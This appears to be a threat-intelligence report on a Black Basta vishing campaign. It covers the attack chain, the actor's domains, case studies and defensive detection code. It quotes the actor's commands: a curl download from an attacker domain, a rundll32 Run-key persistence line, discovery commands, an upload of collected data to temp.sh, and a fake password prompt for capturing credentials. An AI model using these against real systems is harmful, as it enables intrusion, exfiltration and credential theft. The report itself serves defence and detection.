Key Points
- ReliaQuest discovered that the “Black Basta” ransomware group is conducting a mass email spam and voice phishing (vishing) campaign to deploy ransomware.
- The attack begins when a user receives a large volume of spam emails. The threat actor impersonates IT support, offering assistance and instructing the user to download a remote access tool, which grants the attacker initial access.
- Organizations should notify users to raise awareness of this campaign. They should also implement forward proxy rules to block newly registered domains and set up application whitelisting so that only approved remote monitoring and management (RMM) tools can run.
In May 2024, ReliaQuest became aware of a new mass spam and social engineering campaign being conducted by the Black Basta ransomware group. In customer incidents, ReliaQuest observed the attack beginning with a threat actor signing up a specific user’s email for newsletters, mailing lists, and other spam sources, resulting in the user receiving thousands of unwanted emails. The affected users then receive calls from the threat actor, impersonating legitimate IT staff, who persuasively guide the user to download remote access software such as Quick Assist—natively present in Windows 11—or AnyDesk, thus gaining initial access. Various industries have been targeted, indicating the campaign’s opportunistic and financially motivated nature.
Attack Flow
Users at targeted organizations receive thousands of emails, commonly from legitimate organizations' domains. The threat actor then calls the affected users, impersonating legitimate IT staff, and offers to help. The attacker instructs the user to grant them access using an RMM tool, commonly Quick Assist (Windows 11) or AnyDesk. The full attack chain is described below.
- The threat actor subscribes the user’s email to multiple newsletters and mailing lists, causing an influx of thousands of spam emails.
- Posing as IT support, the threat actor contacts the overwhelmed users, offering help to handle the email overload.
- During the conversation, the threat actor persuades the user to install legitimate remote management software, such as Quick Assist (native to Windows 11) or AnyDesk, under the pretext of resolving email issues.
- Once remote access is secured, the attacker executes batch scripts to establish a connection with their command-and-control (C2) servers and to download additional malicious files disguised as legitimate software.
- The threat actor sets up persistence on the compromised system by creating run key entries in the Windows registry through the executed scripts.
- The attacker harvests the user’s credentials, typically under the guise of needing login details to apply updates, and either exfiltrates them immediately or stores them for later retrieval.
- The threat actor attempts to move laterally within the network, deploying additional tools and attempting to execute further malicious payloads, including attempts to install Cobalt Strike beacons.
Infrastructure Analysis
Domains
Following analysis of attacker-owned infrastructure, ReliaQuest observed the threat actors creating new domains on a regular basis, following consistent naming conventions. It is likely this activity is conducted to replace old domains as they are added to threat feeds and therefore become redundant. Examples of this domain registration pattern can be found below.
Created April 18, 2024:
- upd7[.]com
Created April 26, 2024:
- upd9[.]com
Created May 2, 2024:
- upd7a[.]com
- upd7b[.]com
Created May 10, 2024:
- upd9a[.]com
- upd9b[.]com
- upd9c[.]com
Created May 15, 2024:
- upd10a[.]com
- upd10b[.]com
- upd10c[.]com
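The naming convention above is regular enough to hunt on, both for the listed domains and for whatever the actor registers next in the sequence. The following Python block is an added example, not code from the report: it refangs the listed indicators, classifies a destination host as a known indicator or an unlisted sibling that fits the `upd<number><letter>.com` pattern, and runs that check over constructed forward-proxy log lines (the log format, client addresses and the unlisted `upd11a.com` host are assumptions made for the example). The `watchlist()` helper extrapolates the sequence for proactive blocking; its unlisted entries are guesses about where the sequence goes, not observed infrastructure.

```python
import re
from datetime import date
from typing import Optional
from urllib.parse import urlsplit

# Naming convention observed across the campaign's domains: "upd", a number,
# an optional one-letter suffix, under .com. It matches the listed domains and
# any further members of the sequence the actor registers later.
CAMPAIGN_PATTERN = re.compile(r"^upd\d{1,3}[a-z]?\.com$", re.IGNORECASE)

# Domains and creation dates from the report, defanged as the report writes them.
KNOWN_DOMAINS = {
    "upd7[.]com": date(2024, 4, 18),
    "upd9[.]com": date(2024, 4, 26),
    "upd7a[.]com": date(2024, 5, 2),
    "upd7b[.]com": date(2024, 5, 2),
    "upd9a[.]com": date(2024, 5, 10),
    "upd9b[.]com": date(2024, 5, 10),
    "upd9c[.]com": date(2024, 5, 10),
    "upd10a[.]com": date(2024, 5, 15),
    "upd10b[.]com": date(2024, 5, 15),
    "upd10c[.]com": date(2024, 5, 15),
}


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into its real form for matching."""
    return indicator.replace("[.]", ".").replace("[dot]", ".").replace("hxxp", "http")


KNOWN = {refang(d): created for d, created in KNOWN_DOMAINS.items()}


def classify(host: str) -> Optional[str]:
    """'known_ioc' for a listed domain, 'pattern_match' for an unlisted sibling
    that fits the naming convention, None for anything else."""
    host = host.lower().rstrip(".")
    if host in KNOWN:
        return "known_ioc"
    if CAMPAIGN_PATTERN.match(host):
        return "pattern_match"
    return None


def watchlist(numbers=range(7, 13), suffixes=("", "a", "b", "c", "d")) -> list:
    """Candidate domains in the same sequence, for proactive blocking or
    registration monitoring. Entries not in KNOWN_DOMAINS are assumptions
    about the sequence, not observed infrastructure."""
    return [f"upd{n}{s}.com" for n in numbers for s in suffixes]


# Constructed forward-proxy log lines (timestamp, client, method, URL, status).
# Client addresses, the benign hosts and upd11a.com are invented for the example.
SAMPLE_PROXY_LOG = """\
2024-05-16T09:58:03Z 10.20.4.17 GET https://update.microsoft.com/ 200
2024-05-16T10:02:11Z 10.20.4.17 GET https://upd9a.com/update/s.zip 200
2024-05-16T10:02:40Z 10.20.4.17 GET https://upd10c.com/update/s.zip 403
2024-05-16T10:05:55Z 10.20.4.31 GET https://upd11a.com/update/s.zip 200
2024-05-16T10:07:12Z 10.20.4.31 GET https://updates.example.com/patch 200
"""


def hunt(log_text: str) -> list:
    """Return (timestamp, client, host, verdict) for every line whose
    destination host is a listed domain or fits the naming convention."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, client, _method, url = parts[:4]
        host = urlsplit(url).hostname or ""
        verdict = classify(host)
        if verdict:
            hits.append((ts, client, host, verdict))
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_PROXY_LOG):
        print(*hit)
```

The pattern rule deliberately requires a digit immediately after `upd`, so ordinary hosts such as `update.microsoft.com` or `updates.example.com` are not flagged; a `pattern_match` verdict is a lead to triage against registration date and passive DNS, not a confirmed indicator.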
Malicious Payloads
In each instance, the threat actor, while on the phone with the targeted user, pulls the initial malicious payload from one of the above domains. Malicious payloads are typically contained within an archive file named s.zip; we observed this filename in Case Study 2 below.
The contents of these archive files have changed throughout the attack campaign:
- The script name has changed from bat to filtersupdate.bat
- Minor changes have been made to the script itself.
- The C2 IP addresses within the script have changed.
- Passwords for the s.zip archive files have also been changing. Examples include “qaz123” and “felix333.”
- The DLL files “4.dll” and “5.dll” have been added to the script. Once executed, the DLL files are renamed and then registered as run keys for persistence using the following commands:
- set "MAINDIR=%LOCALAPPDATA%\FiltersUpdated"
- move /Y 4.dll "%MAINDIR%\a4adwowks.dll" > nul
- set "RUN_CMD_1=rundll32 "%MAINDIR%\a4adwowks.dll",A2WSC_IsRegistered"
- reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v smon4 /d "rundll32 \"%MAINDIR%\a4adwowks.dll\",A2WSC_IsRegistered" /f > nul
- The script executes the below discovery commands, which are written to a file that is then added to an archive file named “update_log[dot]tar”. The TAR file is subsequently uploaded to temp[dot]sh using cURL.
- whoami /all
- net group "domain controllers" /dom
- ipconfig /all
- route PRINT
- dir "c:\Program Files (x86)"
The goal of this malicious payload is likely to steal user passwords and install a backdoor via OpenSSH and establish persistence with registry Run keys. If successful, the threat actor could return to the compromised host in the future and carry out further actions on objectives.
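The script's behaviour described above (an insecure cURL download of an archive, rundll32 loading a DLL with a named export from a user-writable path, a Run key pointing at that DLL, a burst of discovery commands, and a cURL upload to temp.sh) gives a defender several host-level detection opportunities that do not depend on the domains or IPs. The following Python block is an added example, not code from the report or from the actor's script: it runs those rules over constructed Sysmon-style events (EID 1 process creation, EID 13 registry value set) and correlates the discovery commands per host. The hostnames, the user profile path and the exact cURL upload syntax are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style telemetry (not from the report). Hostnames, the
# "jdoe" profile and the temp.sh upload command line are invented; the other
# command lines mirror the behaviour described in the report.
CMD = "C:\\Windows\\System32\\cmd.exe"
SYS32 = "C:\\Windows\\System32\\"
DLL = "C:\\Users\\jdoe\\AppData\\Local\\FiltersUpdated\\a4adwowks.dll"
EVENTS = [
    {"host": "WS01", "eid": 1, "image": SYS32 + "curl.exe", "parent": CMD,
     "cmdline": "curl -o s.zip --insecure https://upd9a.com/update/s.zip"},
    {"host": "WS01", "eid": 1, "image": SYS32 + "whoami.exe", "parent": CMD,
     "cmdline": "whoami /all"},
    {"host": "WS01", "eid": 1, "image": SYS32 + "net.exe", "parent": CMD,
     "cmdline": 'net group "domain controllers" /dom'},
    {"host": "WS01", "eid": 1, "image": SYS32 + "ipconfig.exe", "parent": CMD,
     "cmdline": "ipconfig /all"},
    {"host": "WS01", "eid": 1, "image": SYS32 + "rundll32.exe", "parent": CMD,
     "cmdline": f'rundll32 "{DLL}",A2WSC_IsRegistered'},
    {"host": "WS01", "eid": 13,
     "key": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\smon4",
     "details": f'rundll32 "{DLL}",A2WSC_IsRegistered'},
    {"host": "WS01", "eid": 1, "image": SYS32 + "curl.exe", "parent": CMD,
     "cmdline": 'curl -F "file=@update_log.tar" https://temp.sh/upload'},
    # Benign noise on a second host: a signed system DLL and a lone ipconfig.
    {"host": "WS02", "eid": 1, "image": SYS32 + "rundll32.exe", "parent": CMD,
     "cmdline": "rundll32 C:\\Windows\\System32\\shell32.dll,Control_RunDLL"},
    {"host": "WS02", "eid": 1, "image": SYS32 + "ipconfig.exe", "parent": CMD,
     "cmdline": "ipconfig /all"},
]

USER_WRITABLE = re.compile(r"(?:%LOCALAPPDATA%|\\AppData\\Local\\|\\AppData\\Roaming\\|\\Temp\\)", re.I)
INSECURE = re.compile(r"(?:^|\s)(?:-k|--insecure)(?=\s|$)")
ARCHIVE = re.compile(r"\.(?:zip|tar|rar|7z)(?:\s|$)", re.I)
# rundll32 <dll>,<export>; group 1 is the DLL path, quoted or not.
RUNDLL_EXPORT = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)"?\s*,\s*\w+', re.I)
UPLOAD = re.compile(r"(?:^|\s)(?:-F|-T|--upload-file|--data-binary)(?=\s|$)")
DISCOVERY = {
    "whoami": re.compile(r"^whoami\s+/all", re.I),
    "netgroup_dc": re.compile(r'^net\s+group\s+"?domain controllers"?\s+/dom', re.I),
    "ipconfig": re.compile(r"^ipconfig\s+/all", re.I),
    "route": re.compile(r"^route\s+print", re.I),
    "dir_progfiles": re.compile(r'^dir\s+"?c:\\program files', re.I),
}


def _is(e, exe):
    return e["eid"] == 1 and e["image"].lower().endswith("\\" + exe)


def r_curl_insecure_archive(e):
    return bool(_is(e, "curl.exe") and INSECURE.search(e["cmdline"]) and ARCHIVE.search(e["cmdline"]))


def r_rundll32_user_dll(e):
    if not _is(e, "rundll32.exe"):
        return False
    m = RUNDLL_EXPORT.search(e["cmdline"])
    return bool(m and USER_WRITABLE.search(m.group(1)))


def r_run_key_rundll32(e):
    return bool(e["eid"] == 13
                and re.search(r"\\CurrentVersion\\Run\\", e["key"], re.I)
                and RUNDLL_EXPORT.search(e["details"])
                and USER_WRITABLE.search(e["details"]))


def r_curl_upload_temp_sh(e):
    return bool(_is(e, "curl.exe") and "temp.sh" in e["cmdline"].lower() and UPLOAD.search(e["cmdline"]))


EVENT_RULES = [r_curl_insecure_archive, r_rundll32_user_dll, r_run_key_rundll32, r_curl_upload_temp_sh]


def detect(events, min_discovery=3):
    """Map host -> sorted rule names that fired. Single-event rules fire on
    their own; the discovery rule needs min_discovery distinct commands."""
    hits = defaultdict(set)
    discovery = defaultdict(set)
    for e in events:
        for rule in EVENT_RULES:
            if rule(e):
                hits[e["host"]].add(rule.__name__[2:])
        if e["eid"] == 1:
            for name, pat in DISCOVERY.items():
                if pat.search(e["cmdline"]):
                    discovery[e["host"]].add(name)
    for host, cmds in discovery.items():
        if len(cmds) >= min_discovery:
            hits[host].add("discovery_burst")
    return {h: sorted(v) for h, v in hits.items()}


if __name__ == "__main__":
    for host, fired in detect(EVENTS).items():
        print(host, fired)
```

The rundll32 rules key on the export name syntax and a user-writable DLL path rather than on `a4adwowks.dll` or `A2WSC_IsRegistered`, since the report notes the DLLs are renamed and the script changes between versions; the Run key rule reads the registry event's data rather than the batch command that wrote it, so it also catches the same persistence set by other means.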
Case Studies
In this section, we delve into three case studies that ReliaQuest observed during this campaign. None of the cases detected by ReliaQuest escalated beyond the initial user. However, other organizations have reported similar events that eventually led to the deployment of Black Basta ransomware.
Case Study 1
An employee, whose address had been subscribed to sources generating approximately 4,000 inbound emails, was targeted by a threat actor impersonating an HR representative. The threat actor convinced the user to open Quick Assist. During the interaction, the threat actor mistakenly identified themselves as IT, raising the user's suspicions. Consequently, the user did not proceed to enter the provided code, effectively halting the attack.
Case Study 2
The threat actor utilized quickassist.exe, a Windows built-in tool, to gain remote access. During the session, the threat actor executed a command to download malicious contents:
curl -o s.zip --insecure hxxps://upd9a[.]com/update/s.zip
The s.zip archive fetched by this command contained two files, which were then written to disk: s.tar and filtersinstall.dat. The naming convention "filtersinstall" was seemingly an attempt by the threat actor to maintain the guise of a helpdesk user running a spam filter script. Notably, the .dat file extension appeared to be a tactic for defense evasion, with subsequent file rename events to a .bat extension observed. However, filtersinstall.bat was blocked by SentinelOne, concluding the attack chain.
Further investigation involved downloading the s.zip file to a sandbox environment, cracking its password protection mechanism (password: qaz123), and reviewing the contents. The analysis revealed several indicators of compromise, including commands to set up connections with C2 IPs and additional batch files intended for persistence:
set "IPS=20.115.96[.]90 91.90.195[.]52 195.123.233[.]42"
set "BAT1=%MAINDIR%\runtimebroker.bat"
set "BAT2=%MAINDIR%\runtimebroker_connect.bat"
set "BAT2_1=%MAINDIR%\runtimebroker_connect_a.bat"
set "BAT2_2=%MAINDIR%\runtimebroker_connect_b.bat"
Case Study 3
This scenario mirrors the attack chain in the previous case study, employing identical infrastructure. The attack was not blocked by EDR, and filtersinstall.bat successfully captured the user's password. The script cleverly included commands that printed strings to the terminal, helping the threat actor maintain the appearance of a legitimate helpdesk worker while covertly capturing credentials:
"To update spam filters enter password for user %USERDOMAIN%\%USERNAME%"
"echo {+} Password is correct!. Finishing updates...."
"echo. Installing spam filter"
The attack was eventually neutralized when the customer reset the user’s password and session, ending the attack chain.
Threat Forecast
As the Black Basta campaign continues to leverage social engineering tactics alongside legitimate remote access tools like Quick Assist and AnyDesk, its threat to organizations remains high. This campaign adeptly manipulates human vulnerabilities by overwhelming targets with spam emails and then impersonating IT support to gain trust and system access. Given the persistent nature of these social engineering attacks, and the ongoing reliance on widely trusted remote management software, organizations are likely to face high threats from Black Basta in the short-term future. It is realistically possible that other ransomware groups could attempt to conduct attacks using similar Tactics, Techniques, and Procedures (TTPs).
What ReliaQuest Is Doing
ReliaQuest has been closely monitoring the campaign since its discovery and promptly adding indicators of compromise (IOCs) to GreyMatter threat feeds for detection. We are continuously monitoring the attacker-controlled infrastructure for changes to malicious files, and the campaign in its entirety, for new updates and responding accordingly.
Recommendations and Best Practices
In addition to implementing detection rules, defenders can take the following steps to significantly enhance the resilience of their systems against this developing threat.
- Implement policies on network proxy devices to block newly registered domains.
- Use application control policies to restrict the use of RMM to only authorized software.
- ReliaQuest customers can execute the GreyMatter Hunt package “Remote Monitoring & Management (RMM) Software” to identify current remote management software in their environment.
- Raise awareness by notifying users, IT personnel, and security teams about this ongoing campaign. Remind users to only use established communication channels and procedures when in need of IT support. Any IT assistance offered outside of established procedures should not be trusted by users.